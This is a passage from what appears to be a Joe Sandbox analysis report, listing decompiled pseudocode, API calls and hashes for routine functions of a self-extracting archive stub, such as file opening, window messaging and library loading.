				if(_t5 != 0) {
					_t9 = L"EDIT";
					_t5 = E000717AC( &_v164, _t9);
					if(_t5 != 0) {
						_t5 = FindWindowExW(_t11, 0, _t9, 0); // executed
						_t11 = _t5;
					}
				}
				if(_t11 != 0) {
					_t6 = SHAutoComplete(_t11, 0x10); // executed
					return _t6;
				}
				return _t5;
			}

0x0007a2d7
0x0007a2de
0x0007a2e6
0x0007a2e9
0x0007a2f6
0x0007a2fd
0x0007a305
0x0007a30b
0x0007a30b
0x0007a30d
0x0007a310
0x0007a315
0x00000000
0x0007a315
0x0007a31f

APIs

GetClassNameW.USER32(?,?,00000050), ref: 0007A2DE
SHAutoComplete.SHLWAPI(?,00000010), ref: 0007A315

Part of subcall function 000717AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0006BB05,00000000,.exe,?,?,00000800,?,?,000785DF,?), ref: 000717C2

FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0007A305

Strings

plv, xrefs: 0007A315
EDIT, xrefs: 0007A2E9, 0007A2F4, 0007A301

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: AutoClassCompareCompleteFindNameStringWindow
String ID: EDIT$plv
API String ID: 4243998846-1016433990
Opcode ID: a38891594531c1f7f9bc382b75fbef495bc5f967bc87e7627f6fa42e12f0828e
Instruction ID: f719c3259d9f25bf3c29e5bc241dab56d20b6f6e899d0cc74435e3ad1957d008
Opcode Fuzzy Hash: a38891594531c1f7f9bc382b75fbef495bc5f967bc87e7627f6fa42e12f0828e
Instruction Fuzzy Hash: 78F08232F0122C77E7205B649C05FDF77AC9F86B10F154156BD49A2181D7689A41C6FA

Uniqueness

Uniqueness Score: -1.00%

Function 000699B0 Relevance: 7.6, APIs: 5, Instructions: 117
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E000699B0(void* __ecx, void* __esi, struct _FILETIME _a4, signed int _a8, short _a12, WCHAR* _a4184, unsigned int _a4188) {
				long _v0;
				void* _t49;
				long _t60;
				unsigned int _t62;
				long _t65;
				signed int _t66;
				char _t69;
				void* _t73;
				void* _t75;
				long _t79;
				void* _t82;

				_t75 = __esi;
				E0007E360();
				_t62 = _a4188;
				_t73 = __ecx;
				 *(__ecx + 0x1024) =  *(__ecx + 0x1024) & 0x00000000;
				if( *((char*)(__ecx + 0x22)) != 0 || (_t62 & 0x00000004) != 0) {
					_t69 = 1;
				} else {
					_t69 = 0;
				}
				_push(_t75);
				asm("sbb esi, esi");
				_t79 = ( ~(_t62 >> 0x00000001 & 1) & 0xc0000000) + 0x80000000;
				if((_t62 & 0x00000001) != 0) {
					_t79 = _t79 | 0x40000000;
				}
				_t65 =  !(_t62 >> 3) & 0x00000001;
				if(_t69 != 0) {
					_t65 = _t65 | 0x00000002;
				}
				_v0 = (0 |  *((intOrPtr*)(_t73 + 0x1b)) != 0x00000000) - 0x00000001 & 0x08000000;
				E000670BF( &_a12);
				if( *((char*)(_t73 + 0x20)) != 0) {
					_t79 = _t79 | 0x00000100;
				}
				_t49 = CreateFileW(_a4184, _t79, _t65, 0, 3, _v0, 0); // executed
				_t82 = _t49;
				if(_t82 != 0xffffffff) {
					L17:
					if( *((char*)(_t73 + 0x20)) != 0 && _t82 != 0xffffffff) {
						_a4.dwLowDateTime = _a4.dwLowDateTime | 0xffffffff;
						_a8 = _a8 | 0xffffffff;
						SetFileTime(_t82, 0,  &_a4, 0);
					}
					 *((char*)(_t73 + 0x18)) = 0;
					_t66 = _t65 & 0xffffff00 | _t82 != 0xffffffff;
					 *((intOrPtr*)(_t73 + 0xc)) = 0;
					 *((char*)(_t73 + 0x10)) = 0;
					if(_t82 != 0xffffffff) {
						 *(_t73 + 4) = _t82;
						E0006FE56(_t73 + 0x24, _a4184, 0x800);
						 *((char*)(_t73 + 0x21)) = 0;
					}
					return _t66;
				} else {
					_a4.dwLowDateTime = GetLastError();
					if(E0006B66C(_a4184,  &_a12, 0x800) == 0) {
						L15:
						if(_a4.dwLowDateTime == 2) {
							 *((intOrPtr*)(_t73 + 0x1024)) = 1;
						}
						goto L17;
					}
					_t82 = CreateFileW( &_a12, _t79, _t65, 0, 3, _v0, 0);
					_t60 = GetLastError();
					if(_t60 == 2) {
						_a4.dwLowDateTime = _t60;
					}
					if(_t82 != 0xffffffff) {
						goto L17;
					} else {
						goto L15;
					}
				}
			}

0x000699b0
0x000699b5
0x000699bb
0x000699c4
0x000699c6
0x000699d1
0x000699dc
0x000699d8
0x000699d8
0x000699d8
0x000699e2
0x000699ea
0x000699f2
0x000699fb
0x000699fd
0x000699fd
0x00069a08
0x00069a0d
0x00069a0f
0x00069a0f
0x00069a24
0x00069a28
0x00069a31
0x00069a33
0x00069a33
0x00069a4c
0x00069a52
0x00069a57
0x00069abb
0x00069ac0
0x00069ac7
0x00069ad0
0x00069adb
0x00069adb
0x00069ae6
0x00069ae9
0x00069aec
0x00069aef
0x00069af5
0x00069b06
0x00069b0a
0x00069b0f
0x00069b0f
0x00069b1e
0x00069a59
0x00069a5f
0x00069a7b
0x00069aaa
0x00069aaf
0x00069ab1
0x00069ab1
0x00000000
0x00069aaf
0x00069a94
0x00069a96
0x00069a9f
0x00069aa1
0x00069aa1
0x00069aa8
0x00000000
0x00000000
0x00000000
0x00000000
0x00069aa8

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,000678AD,?,00000005,?,00000011), ref: 00069A4C
GetLastError.KERNEL32(?,?,000678AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00069A59
CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,000678AD,?,00000005,?), ref: 00069A8E
GetLastError.KERNEL32(?,?,000678AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00069A96
SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,000678AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00069ADB

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: File$CreateErrorLast$Time
String ID:
API String ID: 1999340476-0
Opcode ID: 9485621d29cf5c3c9441c1b6e32962c3c8bf4732281d68caabda4d15fc8168f3
Instruction ID: 8dc18da2a79e8885ece83b39f56ac3ae1fc45f19c6eb7d40c3759c7033ad8fa6
Opcode Fuzzy Hash: 9485621d29cf5c3c9441c1b6e32962c3c8bf4732281d68caabda4d15fc8168f3
Instruction Fuzzy Hash: 574178305447466FE7308B60CC45BDBBBD9BB01324F10071AF5E4965D1E779A988CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 0007AC74 Relevance: 7.5, APIs: 5, Instructions: 39
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0007AC74() {
				struct tagMSG _v32;
				int _t7;
				struct HWND__* _t10;
				long _t14;

				_t7 = PeekMessageW( &_v32, 0, 0, 0, 0); // executed
				if(_t7 != 0) {
					GetMessageW( &_v32, 0, 0, 0);
					_t10 =  *0xa8458; // 0x70354
					if(_t10 == 0) {
						L3:
						TranslateMessage( &_v32);
						_t14 = DispatchMessageW( &_v32); // executed
						return _t14;
					}
					_t7 = IsDialogMessageW(_t10,  &_v32);
					if(_t7 == 0) {
						goto L3;
					}
				}
				return _t7;
			}

0x0007ac85
0x0007ac8d
0x0007ac96
0x0007ac9c
0x0007aca3
0x0007acb4
0x0007acb8
0x0007acc2
0x00000000
0x0007acc2
0x0007acaa
0x0007acb2
0x00000000
0x00000000
0x0007acb2
0x0007accc

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0007AC85
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0007AC96
IsDialogMessageW.USER32(00070354,?), ref: 0007ACAA
TranslateMessage.USER32(?), ref: 0007ACB8
DispatchMessageW.USER32(?), ref: 0007ACC2

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: Message$DialogDispatchPeekTranslate
String ID:
API String ID: 1266772231-0
Opcode ID: 6f7046ded9e44f44b1b1ceef49f3c0d95f6510a705eed84ddee25e1e59092a21
Instruction ID: 7dbec8c8097d0e63b8989eba3ec17b009440c14712a983dc94f98f1d07ff5542
Opcode Fuzzy Hash: 6f7046ded9e44f44b1b1ceef49f3c0d95f6510a705eed84ddee25e1e59092a21
Instruction Fuzzy Hash: 21F0BD71D01229AB9B209BE59C4CDEF7FACEF062517408416F519D2511EA2CD505C7B1

Uniqueness

Uniqueness Score: -1.00%

Function 0007A335 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 25%

			E0007A335(intOrPtr* __ecx) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _t10;

				_t10 = E00070085(L"riched20.dll"); // executed
				 *__ecx = _t10;
				 *0xc217c(0); // executed
				_v16 = 8;
				_v12 = 0x7ff;
				 *0xc2034( &_v16); // executed
				_v32 = 1;
				_v28 = 0;
				_v24 = 0;
				_v20 = 0;
				L0007E23E(); // executed
				 *0xc2088(0xa8430,  &_v8,  &_v32, 0); // executed
				return __ecx;
			}

0x0007a344
0x0007a34b
0x0007a34e
0x0007a357
0x0007a35f
0x0007a366
0x0007a370
0x0007a37b
0x0007a37f
0x0007a382
0x0007a385
0x0007a38f
0x0007a39c

APIs

Part of subcall function 00070085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 000700A0
Part of subcall function 00070085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0006EB86,Crypt32.dll,00000000,0006EC0A,?,?,0006EBEC,?,?,?), ref: 000700C2

OleInitialize.OLE32(00000000), ref: 0007A34E
GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0007A385
SHGetMalloc.SHELL32(000A8430), ref: 0007A38F

Strings

riched20.dll, xrefs: 0007A33D

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
String ID: riched20.dll
API String ID: 3498096277-3360196438
Opcode ID: da320275e002dc6c6a4aa442587f9c8824ed5a5c57821d13256732a60d59950f
Instruction ID: 1e68056b386b7f984edd3eb983449f21de36e6bb9753a3131accf8e68c75deb9
Opcode Fuzzy Hash: da320275e002dc6c6a4aa442587f9c8824ed5a5c57821d13256732a60d59950f
Instruction Fuzzy Hash: BFF049B1C00209ABDB10AF99D8499EFFBFCEF95701F00815AE914E2241CBB806058BA1

Uniqueness

Uniqueness Score: -1.00%

Function 0007D287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 66%

			E0007D287(void* __eflags, WCHAR* _a4) {
				char _v8196;
				int _t7;
				WCHAR* _t12;
				void* _t14;

				_t14 = __eflags;
				E0007E360();
				SetEnvironmentVariableW(L"sfxcmd", _a4); // executed
				_t7 = E0006FBD8(_t14, _a4,  &_v8196, 0x1000);
				_t12 = _t7;
				if(_t12 != 0) {
					_push( *_t12 & 0x0000ffff);
					while(E0006FCF1() != 0) {
						_t12 =  &(_t12[1]);
						__eflags = _t12;
						_push( *_t12 & 0x0000ffff);
					}
					_t7 = SetEnvironmentVariableW(L"sfxpar", _t12); // executed
				}
				return _t7;
			}

0x0007d287
0x0007d28f
0x0007d29d
0x0007d2b2
0x0007d2b7
0x0007d2bb
0x0007d2c0
0x0007d2ca
0x0007d2c3
0x0007d2c3
0x0007d2c9
0x0007d2c9
0x0007d2d9
0x0007d2d9
0x0007d2e3

APIs

SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0007D29D
SetEnvironmentVariableW.KERNELBASE(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0007D2D9

Strings

sfxpar, xrefs: 0007D2D4
sfxcmd, xrefs: 0007D298

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: EnvironmentVariable
String ID: sfxcmd$sfxpar
API String ID: 1431749950-3493335439
Opcode ID: e8b85fb978b336f36da33026dba47d7e00d0ae27d12982ce071b3e142ce5fd06
Instruction ID: 6839ff7254163b42c920130227ce40d901443622fb42c7fba3cbedb205853c79
Opcode Fuzzy Hash: e8b85fb978b336f36da33026dba47d7e00d0ae27d12982ce071b3e142ce5fd06
Instruction Fuzzy Hash: 2CF02771C01228A2DB202F91DC09AFE77A9AF18742B004012FD4C56102D628CD41DBF4

Uniqueness

Uniqueness Score: -1.00%

Function 0006984E Relevance: 6.1, APIs: 4, Instructions: 57
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 59%

			E0006984E(void* __ecx, void* _a4, long _a8) {
				long _v8;
				int _t14;
				signed int _t15;
				void* _t25;

				_push(__ecx);
				_t25 = __ecx;
				if( *((intOrPtr*)(__ecx + 0xc)) == 1) {
					 *(_t25 + 4) = GetStdHandle(0xfffffff6);
				}
				_t14 = ReadFile( *(_t25 + 4), _a4, _a8,  &_v8, 0); // executed
				if(_t14 != 0) {
					_t15 = _v8;
				} else {
					_t16 = E00069989(_t25);
					if(_t16 == 0) {
						L7:
						if( *((intOrPtr*)(_t25 + 0xc)) != 1) {
							L10:
							if( *((intOrPtr*)(_t25 + 0xc)) != 0 || _a8 <= 0x8000) {
								L14:
								_t15 = _t16 | 0xffffffff;
							} else {
								_t16 = GetLastError();
								if(_t16 != 0x21) {
									goto L14;
								} else {
									_push(0x8000);
									goto L6;
								}
							}
						} else {
							_t16 = GetLastError();
							if(_t16 != 0x6d) {
								goto L10;
							} else {
								_t15 = 0;
							}
						}
					} else {
						_t16 = 0x4e20;
						if(_a8 <= 0x4e20) {
							goto L7;
						} else {
							_push(0x4e20);
							L6:
							_push(_a4);
							_t15 = E0006984E(_t25);
						}
					}
				}
				return _t15;
			}

0x00069851
0x00069853
0x0006985a
0x00069864
0x00069864
0x00069876
0x0006987e
0x000698da
0x00069880
0x00069882
0x00069889
0x000698a2
0x000698a6
0x000698b7
0x000698bb
0x000698d5
0x000698d5
0x000698c7
0x000698c7
0x000698d0
0x00000000
0x000698d2
0x000698d2
0x00000000
0x000698d2
0x000698d0
0x000698a8
0x000698a8
0x000698b1
0x00000000
0x000698b3
0x000698b3
0x000698b3
0x000698b1
0x0006988b
0x0006988b
0x00069893
0x00000000
0x00069895
0x00069895
0x00069896
0x00069896
0x0006989b
0x0006989b
0x00069893
0x00069889
0x000698e2

APIs

GetStdHandle.KERNEL32(000000F6), ref: 0006985E
ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 00069876
GetLastError.KERNEL32 ref: 000698A8
GetLastError.KERNEL32 ref: 000698C7

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: be68378494853090434206edaa95a8edd792da6ce824fb15f30f0e5412474c9b
Instruction ID: 604266310e964629840630bda3c8b5b602ff6f2c42ed6e505a6ac9b06d2fa848
Opcode Fuzzy Hash: be68378494853090434206edaa95a8edd792da6ce824fb15f30f0e5412474c9b
Instruction Fuzzy Hash: 17115A30900204EFDB609A55C804AB977EEFF46771F10852AE86A87D90DF399E449F51

Uniqueness

Uniqueness Score: -1.00%

Function 0008A4F4 Relevance: 6.1, APIs: 4, Instructions: 52
libraryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 95%

			E0008A4F4(signed int _a4) {
				signed int _t9;
				void* _t10;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0xc15e0 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0x96e90 + _t9 * 4);
					_t10 = LoadLibraryExW(_t22, 0, 0x800); // executed
					_t27 = _t10;
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0x136d1c6
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}

0x0008a4f9
0x0008a4fd
0x0008a504
0x0008a508
0x0008a516
0x0008a526
0x0008a52c
0x0008a530
0x0008a559
0x0008a55b
0x0008a55f
0x0008a562
0x0008a562
0x0008a568
0x0008a56a
0x00000000
0x0008a56b
0x0008a532
0x0008a53b
0x0008a54a
0x0008a53d
0x0008a540
0x0008a546
0x0008a546
0x0008a54e
0x00000000
0x0008a550
0x0008a553
0x0008a555
0x00000000
0x0008a555
0x0008a54e
0x0008a50a
0x0008a50f
0x00000000

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,0006CFE0,00000000,00000000,?,0008A49B,0006CFE0,00000000,00000000,00000000,?,0008A698,00000006,FlsSetValue), ref: 0008A526
GetLastError.KERNEL32(?,0008A49B,0006CFE0,00000000,00000000,00000000,?,0008A698,00000006,FlsSetValue,00097348,00097350,00000000,00000364,?,00089077), ref: 0008A532
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0008A49B,0006CFE0,00000000,00000000,00000000,?,0008A698,00000006,FlsSetValue,00097348,00097350,00000000), ref: 0008A540

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 2c9645c0575c726771c42c5345ff18b8c8c2a5d3381555ff86c78a72fc9f686c
Instruction ID: ca5f0eae8efecf8715d05119971bca1c31b9dd029c31dd64e9f5bbf4a7615699
Opcode Fuzzy Hash: 2c9645c0575c726771c42c5345ff18b8c8c2a5d3381555ff86c78a72fc9f686c
Instruction Fuzzy Hash: 83017B32701A22ABE7309B689C44B577B98BF47BA17100123FD46D3540D735DE40CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 0008B188 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E0008B188(signed int __ebx, void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, char _a8) {
				char _v8;
				char _v16;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t31;
				signed int _t36;
				char _t40;
				intOrPtr _t44;
				char _t45;
				signed int _t51;
				void* _t64;
				void* _t70;
				signed int _t75;
				void* _t81;

				_t81 = __eflags;
				_v8 = E00088FA5(__ebx, __ecx, __edx);
				E0008B2AE(__ebx, __ecx, __edx, _t81);
				_t31 = E0008AF1B(_t81, _a4);
				_v16 = _t31;
				_t57 =  *(_v8 + 0x48);
				if(_t31 ==  *((intOrPtr*)( *(_v8 + 0x48) + 4))) {
					return 0;
				}
				_push(__ebx);
				_t70 = E00088518(_t57, 0x220);
				_t51 = __ebx | 0xffffffff;
				__eflags = _t70;
				if(__eflags == 0) {
					L5:
					_t75 = _t51;
					goto L6;
				} else {
					_t70 = memcpy(_t70,  *(_v8 + 0x48), 0x88 << 2);
					 *_t70 =  *_t70 & 0x00000000; // executed
					_t36 = E0008B350(_t51, _t70,  *(_v8 + 0x48), __eflags, _v16, _t70); // executed
					_t75 = _t36;
					__eflags = _t75 - _t51;
					if(_t75 != _t51) {
						__eflags = _a8;
						if(_a8 == 0) {
							E000882CF();
						}
						asm("lock xadd [eax], ebx");
						__eflags = _t51 == 1;
						if(_t51 == 1) {
							_t45 = _v8;
							__eflags =  *((intOrPtr*)(_t45 + 0x48)) - 0x9eb20;
							if( *((intOrPtr*)(_t45 + 0x48)) != 0x9eb20) {
								E000884DE( *((intOrPtr*)(_t45 + 0x48)));
							}
						}
						 *_t70 = 1;
						_t64 = _t70;
						_t70 = 0;
						 *(_v8 + 0x48) = _t64;
						_t40 = _v8;
						__eflags =  *(_t40 + 0x350) & 0x00000002;
						if(( *(_t40 + 0x350) & 0x00000002) == 0) {
							__eflags =  *0x9eda0 & 0x00000001;
							if(( *0x9eda0 & 0x00000001) == 0) {
								_v16 =  &_v8;
								E0008ADF1(5,  &_v16);
								__eflags = _a8;
								if(_a8 != 0) {
									_t44 =  *0x9ed40; // 0x3232130
									 *0x9e814 = _t44;
								}
							}
						}
						L6:
						E000884DE(_t70);
						return _t75;
					} else {
						 *((intOrPtr*)(E0008895A())) = 0x16;
						goto L5;
					}
				}
			}

0x0008b188
0x0008b195
0x0008b198
0x0008b1a0
0x0008b1a9
0x0008b1ac
0x0008b1b2
0x00000000
0x0008b1b4
0x0008b1b8
0x0008b1c5
0x0008b1c7
0x0008b1cb
0x0008b1cd
0x0008b1fd
0x0008b1fd
0x00000000
0x0008b1cf
0x0008b1dc
0x0008b1e2
0x0008b1e5
0x0008b1ea
0x0008b1ee
0x0008b1f0
0x0008b20f
0x0008b213
0x0008b215
0x0008b215
0x0008b220
0x0008b224
0x0008b225
0x0008b227
0x0008b22a
0x0008b231
0x0008b236
0x0008b23b
0x0008b231
0x0008b23c
0x0008b242
0x0008b247
0x0008b249
0x0008b24c
0x0008b24f
0x0008b256
0x0008b258
0x0008b25f
0x0008b264
0x0008b26d
0x0008b272
0x0008b278
0x0008b27a
0x0008b27f
0x0008b27f
0x0008b278
0x0008b25f
0x0008b1ff
0x0008b200
0x00000000
0x0008b1f2
0x0008b1f7
0x00000000
0x0008b1f7
0x0008b1f0

APIs

Part of subcall function 00088FA5: GetLastError.KERNEL32(?,000A0EE8,00083E14,000A0EE8,?,?,00083713,00000050,?,000A0EE8,00000200), ref: 00088FA9
Part of subcall function 00088FA5: _free.LIBCMT ref: 00088FDC
Part of subcall function 00088FA5: SetLastError.KERNEL32(00000000,?,000A0EE8,00000200), ref: 0008901D
Part of subcall function 00088FA5: _abort.LIBCMT ref: 00089023

Part of subcall function 0008B2AE: _abort.LIBCMT ref: 0008B2E0
Part of subcall function 0008B2AE: _free.LIBCMT ref: 0008B314

Part of subcall function 0008AF1B: GetOEMCP.KERNEL32(00000000,?,?,0008B1A5,?), ref: 0008AF46

_free.LIBCMT ref: 0008B200
_free.LIBCMT ref: 0008B236

Strings

, xrefs: 0008B22A

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: _free$ErrorLast_abort
String ID:
API String ID: 2991157371-1867143179
Opcode ID: 8dcd9ffdc0007c45310f54d6f1ebd69c95856d920aa96c9212c996592560b325
Instruction ID: c41229d181bd7809b42cbf9af89d29573aa8a17a26f368e7fbeb1be2a7e1ba77
Opcode Fuzzy Hash: 8dcd9ffdc0007c45310f54d6f1ebd69c95856d920aa96c9212c996592560b325
Instruction Fuzzy Hash: 5031F631904204AFDB10FFA9C845BAE77E5FF45320F654099E4949B2A2EF755D41CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00069F2F Relevance: 4.6, APIs: 3, Instructions: 107
fileCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E00069F2F(void* __edx, void* _a4, long _a8) {
				char _v4;
				long _v8;
				void* __ecx;
				void* __ebp;
				int _t28;
				intOrPtr _t31;
				long _t36;
				int _t39;
				void* _t43;
				intOrPtr* _t49;
				intOrPtr* _t50;
				void* _t58;
				intOrPtr _t62;
				void* _t66;
				long _t68;

				_t58 = __edx;
				_t68 = _a8;
